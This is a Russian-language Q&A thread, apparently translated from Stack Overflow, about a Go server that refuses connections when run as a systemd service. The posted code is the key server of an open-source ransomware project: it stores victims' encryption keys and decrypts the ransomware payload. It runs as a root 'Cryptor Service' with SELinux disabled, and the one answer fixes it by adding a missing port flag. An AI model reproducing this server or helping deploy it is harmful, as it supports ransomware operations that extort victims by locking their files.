Программа, запущенная как сервис systemd, отказывается от подключения - PullRequest
0 голосов
/ 30 апреля 2020

У меня есть сценарий go, который отвечает на запросы HTTP и взаимодействует с некоторыми файлами. Когда я запускаю его из командной строки, он работает отлично, но при запуске в качестве службы через systemd он не отвечает на запросы.

Это выполняется на виртуальной машине CentOS 8.

Сценарий скомпилирован / собран с использованием go build --ldflags "-s -w"

Я отключил SE Linux, так что это не проблема.

Вот код Go:

package main

import (
    "flag"
    "fmt"
    "log"

    "io/ioutil"

    "github.com/labstack/echo/engine"
    "github.com/labstack/echo/engine/standard"
    "github.com/labstack/echo/middleware"
    "github.com/mauri870/ransomware/repository"
    "github.com/mauri870/ransomware/web"
)

var (
    // BoltDB database to store the keys
    // Will be create if not exists
    database = "database.db"

    // Private key used to decrypt the ransomware payload
    privateKey = "private.pem"
)

func main() {
    port := flag.Int("port", 8080, "The port to listen on")
    flag.Parse()

    privkey, err := ioutil.ReadFile(privateKey)
    if err != nil {
        log.Fatalln(err)
    }

    db := repository.Open(database)
    defer db.Close()

    e := web.NewEngine()
    e.PrivateKey = privkey
    e.Database = db

    e.GET("/", e.Index)

    e.Use(middleware.Logger())
    e.Use(middleware.Recover())

    api := e.Group("/api", middleware.CORS())
    api.POST("/keys/add", e.AddKeys, e.DecryptPayloadMiddleware)
    api.GET("/keys/:id", e.GetEncryptionKey)

    log.Fatal(e.Run(standard.WithConfig(engine.Config{
        Address: fmt.Sprintf(":%d", *port),
    })))
}

Вот эта услуга:

[Unit]
Description=Cryptor Service
After=network.target

[Service]
Type=simple
User=root
Restart=on-failure
WorkingDirectory=/RanServer
ExecStart=/RanServer/server

[Install]
WantedBy=multi-user.target

Вот эта услуга:

● cryptor.service - Cryptor Service
   Loaded: loaded (/etc/systemd/system/cryptor.service; enabled; vendor preset: disabled)
   Active: active (running) since Thu 2020-04-30 10:36:19 EDT; 6min ago
 Main PID: 3232 (server)
    Tasks: 6 (limit: 26213)
   Memory: 8.7M
   CGroup: /system.slice/cryptor.service
           └─3232 /RanServer/server

1 Ответ

0 голосов
/ 30 апреля 2020

Я забыл добавить --port 8069 в строку службы ExecStart.

После добавления, что все заработало.

...